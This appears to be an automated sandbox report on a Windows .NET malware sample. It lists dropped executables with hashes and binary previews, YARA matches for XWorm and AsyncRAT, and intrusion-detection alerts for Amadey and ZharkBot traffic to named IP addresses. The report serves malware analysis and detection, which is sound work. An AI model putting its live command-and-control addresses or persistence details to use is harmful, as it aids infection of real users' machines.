SHA-512:	7CAA2416BC7878493B62A184DDC844D201A9AB5282ABFA77A616316AF39FF65309E37BB566B3E29D9E764E08F4EDA43A06464ACAF9962F911B33E6DBC60C1861
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96% Antivirus: Virustotal, Detection: 86%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............k...k...k.......k......hk.......k.......k......k......k.....k.......k...k..\|k.......k.......k..Rich.k..................PE..L....G.f.....................R......K.............@..........................@............@.................................4....................................)......8..............................@............................................text.............................. ..`.rdata..............................@..@.data...."..........................@....reloc...).......*..................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\349587345342\Windows.lnk

Download File

Process:	C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Jul 31 19:42:18 2024, mtime=Wed Jul 31 19:42:22 2024, atime=Wed Jul 31 19:42:18 2024, length=96256, window=hide
Category:	dropped
Size (bytes):	755
Entropy (8bit):	5.179376763482816
Encrypted:	false
SSDEEP:	12:8r4e5/1lXs/4U/jv0rJC548FM+MEjAozXoW+1gUNwuLTHc44t2YZ/elFlSJmZmV:8rNvxmjv0rJl8FM+MQAozR+17LbqyFm
MD5:	D850DEBA34777C07393BF0185F413E71
SHA1:	17FA1C4C33CE96B3ECFA85BF1D0BD0D3D9DDABD5
SHA-256:	5CD850CF5C50CD040A87B1B27E2FC243E22BE6D14A7B8966212C9BF75D6D6670
SHA-512:	69699F59479C8D966AC77934342EF398B006E637EF1F8C4559A336C1144CD48238915483E452048B6E083E7FDB3FFEFC0361A454940984836B3066F3B4973F8F
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... ...o..E....G'.G....o..E.....x........................:..DG..Yr?.D..U..k0.&...&......vk.v....o..E....._.H........t. .CFSF..2..x...YJ. .Windows.exe...t.Y^...H.g.3..(.....gVA.G..k...H.......YJ..YJ.....Q......................B..W.i.n.d.o.w.s...e.x.e...F...I...............-.......H.............h......C:\Users\user\Windows.exe........\.....\.....\.....\.W.i.n.d.o.w.s...e.x.e.............:...........\|....I.J.H..K..:...`.......X.......142233...........hT..CrF.f4... ...T..b...,.......hT..CrF.f4... ...T..b...,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Users\user\AppData\Local\Temp\Log.tmp

Download File

Process:	C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe
File Type:	Generic INItialization configuration [WIN]
Category:	modified
Size (bytes):	58
Entropy (8bit):	3.598349098128234
Encrypted:	false
SSDEEP:	3:rRSFYJKXzovNsr42VjFYJKXzovX:EFYJKDoWr5FYJKDoP
MD5:	5362ACB758D5B0134C33D457FCC002D9
SHA1:	BC56DFFBE17C015DB6676CF56996E29DF426AB92
SHA-256:	13229E0AD721D53BF9FB50FA66AE92C6C48F2ABB785F9E17A80E224E096028A4
SHA-512:	3FB6DA9993FBFC1DC3204DC2529FB7D9C6FE4E6F06E6C8E2DC0BE05CD0E990ED2643359F26EC433087C1A54C8E1C87D02013413CE8F4E1A6D2F380BE0F5EB09B
Malicious:	false
Reputation:	unknown
Preview:	....### explorer ###..[WIN]r[WIN]....### explorer ###..r

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5jec2daz.143.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eezo4bmw.si1.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hjbvjmfy.tpa.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o2znzumn.hsd.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\xzzrvckwuia.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	550912
Entropy (8bit):	5.30136226878319
Encrypted:	false
SSDEEP:	6144:EYqdc0NkzDV+9JeTIlA41hpcN3p0NIb88WsNMPaKFP3b2V122J0sL:E9J84zPXcN3CNIb88WsNMP5F1k
MD5:	85441D14F17C49EA015D5CC9C53FE164
SHA1:	6532BD0DFC162CB8F5BEB37F9C1EB0861FDC6A8B
SHA-256:	B78104CE8EF14D177D4F9F9458930A54D067E6D35A482E5F323860D4443D1888
SHA-512:	34AA3713C9B38D3B1CF14DBD09DDF9E187FD9FBEB4FD490C85D9C14A3F2EF928C74377A6DCE09042279DBBC3E49A915C3309E16716D02AEC1609D1AC3A7C5E08
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Virustotal, Detection: 64%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A.n...............0.................. ........@.. ....................................@.................................\|...O.......b............................................................................ ............... ..H............text....... ...................... ..`.rsrc...b...........................@..@.reloc...............f..............@..B........................H............)......E...........P .......................................................................................................................................................................D~..;...].1...!H...N.I..N...e.F..X.....V:......)..]"..fSZ.{f....PQAeS~....'^.:.k.;.E...X.....K0.U vm...v...L%....O*...5D.&b....ZI..g%...E...]/u..L...F......k._......mz.RY...-.t!.X.i)I..D..ju.yx.X>k..q.'.O...... .f..:.}.J.c.1..Q3`.S.Ebdw.k........+..HhXpE....l..{..Rs.#.K..r

C:\Users\user\AppData\Roaming\Guid\TypeId.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000267001\52i.exe
File Type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	732672
Entropy (8bit):	7.951474723644558
Encrypted:	false
SSDEEP:	12288:LNtiEVOD9lCMlex5aMHGj4CNO+y6uY7FogRt+KiW6G0YoYEZe9l:5tP29Tex5aPj/zyKogRcKiW4KEs
MD5:	4D190C235680B3E4481E4D7685E9A118
SHA1:	17C5654E4077F9E0DD8E17E92E36696BED55557A
SHA-256:	4083F1EA732FD45ABE2F648F824BE39E3E511A59179FA7C8349D7F7F75E3D3B4
SHA-512:	517807DD7345C926CFC2E58D883764368C723900871AB358949A09BB6B23DCAEF1A8DB8096EBB2DF08112E6914F893CDCC0B5FA8B78BC70008390598353BA771
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79% Antivirus: Virustotal, Detection: 62%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....................0..&............... ....@...... ....................................`...@......@............... ...............................`..`............................................................................................ ..H............text....$... ...&.................. ..`.rsrc...`....`.......(..............@..@........................................H.......4....X..........@...................................................(.......(....*.0..........(......8....... ....o....8........o......o....o......82..... A..{ ....b .X..a~....{....a(+...(....o....8....s......8,..... ..gh ....a~....{....a(+...(....o....8z....s......8..... .?.......%.....(....s......8..........s......8.........o....8......o....s......8.............8.......s......8 ......(......8..........o....&8.........o....8>....+...( ..... ..f -..za~....{C...a(+...(!...

C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1422336
Entropy (8bit):	7.324214382355643
Encrypted:	false
SSDEEP:	24576:XF1ci4Lmy1ZBk0arIT4+hmmnPgM7jixqS8fWW9MVWCmx:X3ci4LB1ZW0p4+hmIPgM7wV5mx
MD5:	3ADFC7CF1E296C6FB703991C5233721D
SHA1:	FDDD2877CE7952B91C3F841CA353235D6D8EEA67
SHA-256:	6BC23179D079D220337EDE270113D4A474B549F5F0C7FD57F3D33D318F7AE471
SHA-512:	5136525626C3021BAF8D35BE0D76473CC03BFE2433682D613650B8E4BB444F767D2D14AC0070CE46C4C220E0A71A8F2E789E4E684E2042BD78B60F68F35A652B
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 41%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....x................0.................. ........@.. ....................... ............@.................................`...K.......H............................................................................ ............... ..H............text........ ...................... ..`.rsrc...H...........................@..@.reloc..............................@..B........................H........>.........0.......................................................:...r.....e..<.(.......^.a%WCE.x.......hD"....6........Q..g...)...~...J....S...2....G.9Y%...`.a.g1K.Z..2}....0.J...h........<;...!...m.A....K.D\|...C-IP(...E.v.#.a$.T..]~$..G.M..,e.........l.\P"d#...`..3.. .......g.......;..^.m..wav...E...,~.gZ...C.......................................................................................\\........x.J....J.x....................................

C:\Users\user\Pictures\Illumination.pif

Download File

Process:	C:\Users\user\Desktop\trSK2fqPeB.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	551936
Entropy (8bit):	6.733777207362577
Encrypted:	false
SSDEEP:	12288:qOfX3Lh7cnz3M+QnY1UXC0lQkqTJ9k3TBV+zF:nHJcnz3HIC0lmk3TqF
MD5:	4D40EBB93AA34BF94D303C07C6A7E5E5
SHA1:	9333BC5B3F78F0A3CCA32E1F6A90AF8064BF8A81
SHA-256:	EF46CED1CEA1C98722DC71AA0CF640BDC38D8677D92026B6FDE6CE6EE2D623B5
SHA-512:	9CDCE881809159AD07D99E9691C1457E7888AA96CF0EA93A19EEA105B9DB928F8F61C8DE98C3B9179556B528FDE4EB790D59E954DB8A86799AECB38461741D3A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 34% Antivirus: Virustotal, Detection: 32%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....h..........."...0..b............... ........@.. ....................................@.................................:...O.......................................8............................................ ............... ..H............text....a... ...b.................. ..`.rsrc................d..............@..@.reloc...............j..............@..B................n.......H.......d1..............PI..H7............................................~....}.....~....}.....~....}.....(.....(......{....t....}....z.{....r...po...........o....&..0..!.........{........(....(....}.....(........0..!.........{........(....(....}.....(........0..!.........{........(....(....}.....(........0..!.........{........(....(....}.....(........0..!.........{........(....(....}.....(........0..!.........{........(....(....}.....(........0..!.........{........(

C:\Users\user\Pictures\Illumination.pif:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\trSK2fqPeB.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	unknown
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\Windows.exe

Download File

Process:	C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	96256
Entropy (8bit):	5.97238192300277
Encrypted:	false
SSDEEP:	1536:1z8H8uTSHKoKlDeE0C3shB1ueVby8EXEFA4Xib6TWcgMfAOISZsw61EmS:+c/q/l6EP3mvuwby8EXuhX6cgXOI0stE
MD5:	DB5717FD494495EEA3C8F7D4AB29D6B0
SHA1:	39BA82340121D9B08E9CF3D4BA6DFCB12EB6C559
SHA-256:	6B59309AB12F1859A94FB2CE1C98639B2A538E6E098FFAC127E45C29733BD993
SHA-512:	B16C7BFFC8418A0349E5189D61439DF325D2AB33A42C720380A305DECDE00348F83D96B6C263A95DC253128EB0E47B1A3DC96F8F115DA868FF9227B9A40882DE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\Windows.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\Windows.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\Windows.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96% Antivirus: Virustotal, Detection: 86%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=.f.................n............... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...4m... ...n.................. ..`.rsrc................p..............@..@.reloc...............v..............@..B........................H........g..H%......&.....................................................(.....r...p. ......(.....rC..p.s.........s.........s.........s..........rg..p. g.h..r...p. r....r/..p. .....r...p. p{..r...p. ..?...((....r...p. ....r...p. S....(+...-.(,...,.+.(-...,.+.(...,.+.()...,..(Z..."(....+."(....+.&(9...&+..+5sk... .... .'..ol...(,...~....-.(b...(T...~....om...&.-..ra..p. .....r...p. .y4..r)..p. E/...r...p.r...p.rU..p.r...p. ..'..r...p.

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Reputation:	unknown
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.4629492296799995
Encrypted:	false
SSDEEP:	6144:gIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uN2dwBCswSbn:lXD94+WlLZMM6YFHg+n
MD5:	6F7EEE2DFF6497C2A5E21F28945DC748
SHA1:	C98DE46841545D385C6B176C20A27122D47B88BE
SHA-256:	28F8732534B034FE64BD953D478BCA15E2C1EC6B5A20A7C73232B163F39A4C4F
SHA-512:	7C2D62D1644831A9A98A025EA59856716A6528000BC62D02CD0F185A344D0C9A1592C5EF922037DDA94078692B14BB81F6AF34AF1A20FDA861835E94B201FB8F
Malicious:	false
Reputation:	unknown
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.%.=.................................................................................................................................................................................................................................................................................................................................................D..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.733777207362577
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	trSK2fqPeB.exe
File size:	551'936 bytes
MD5:	4d40ebb93aa34bf94d303c07c6a7e5e5
SHA1:	9333bc5b3f78f0a3cca32e1f6a90af8064bf8a81
SHA256:	ef46ced1cea1c98722dc71aa0cf640bdc38d8677d92026b6fde6ce6ee2d623b5
SHA512:	9cdce881809159ad07d99e9691c1457e7888aa96cf0ea93a19eea105b9db928f8f61c8de98c3b9179556b528fde4eb790d59e954db8a86799aecb38461741d3a
SSDEEP:	12288:qOfX3Lh7cnz3M+QnY1UXC0lQkqTJ9k3TBV+zF:nHJcnz3HIC0lmk3TqF
TLSH:	3BC47C10EF135E4DDC401332A31677996B97CCA80213CA8E7E4B7A7D7D366E0A2598E7
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....h..........."...0..b............... ........@.. ....................................@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x48818e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xD768CC16 [Sun Jul 9 08:23:50 2084 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8813a	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8a000	0x5f8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8c000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x88098	0x38	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x86194	0x86200	a967b856041743a1342ed7626a5a265c	False	0.47975885368126747	data	6.7373317202111735	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x8a000	0x5f8	0x600	5b90fb11fa1533007f33f32d620f7667	False	0.4348958333333333	data	4.190286080733786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8c000	0xc	0x200	3b5af939b6a0d9ccb04a64f85f0cf69b	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x8a090	0x368	data			0.41628440366972475
RT_MANIFEST	0x8a408	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-31T22:44:29.705869+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50028	443	192.168.2.4	188.114.96.3
2024-08-31T22:43:55.928351+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49965	443	192.168.2.4	188.114.96.3
2024-08-31T22:43:14.525078+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49881	443	192.168.2.4	188.114.96.3
2024-08-31T22:43:30.633111+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49913	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:29.288415+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49789	80	192.168.2.4	185.216.214.225
2024-08-31T22:42:29.288415+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49789	80	192.168.2.4	185.216.214.225
2024-08-31T22:45:51.052311+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50175	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:27.800653+0200	TCP	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	49788	80	192.168.2.4	185.215.113.19
2024-08-31T22:44:23.440990+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50019	443	192.168.2.4	188.114.96.3
2024-08-31T22:45:29.540398+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50134	443	192.168.2.4	188.114.96.3
2024-08-31T22:45:55.789940+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50186	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:09.462487+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49746	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:09.462487+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49746	443	192.168.2.4	188.114.96.3
2024-08-31T22:41:59.347319+0200	TCP	2856122	ETPRO MALWARE Amadey CnC Response M1	1	80	49733	185.215.113.19	192.168.2.4
2024-08-31T22:44:41.407249+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50049	443	192.168.2.4	188.114.96.3
2024-08-31T22:45:03.634866+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50088	443	192.168.2.4	188.114.96.3
2024-08-31T22:44:03.846580+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49981	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:02.174685+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	49738	80	192.168.2.4	185.215.113.19
2024-08-31T22:41:57.758960+0200	TCP	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	49732	80	192.168.2.4	185.215.113.19
2024-08-31T22:45:44.339713+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50161	443	192.168.2.4	188.114.96.3
2024-08-31T22:45:22.080354+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50120	443	192.168.2.4	188.114.96.3
2024-08-31T22:44:45.200959+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50057	443	192.168.2.4	188.114.96.3
2024-08-31T22:45:28.286178+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50131	443	192.168.2.4	188.114.96.3
2024-08-31T22:42:11.371315+0200	TCP	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	49752	80	192.168.2.4	185.215.113.19
2024-08-31T22:42:26.378243+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49783	443	192.168.2.4	188.114.96.3
2024-08-31T22:44:18.202802+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50009	443	192.168.2.4	188.114.96.3
2024-08-31T22:44:42.796744+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	50052	443	192.168.2.4	188.114.96.3
2024-08-31T22:43:35.238140+0200	TCP	2054413	ET MALWARE ZharkBot User-Agent Observed	1	49921	443	192.168.2.4	188.114.96.3
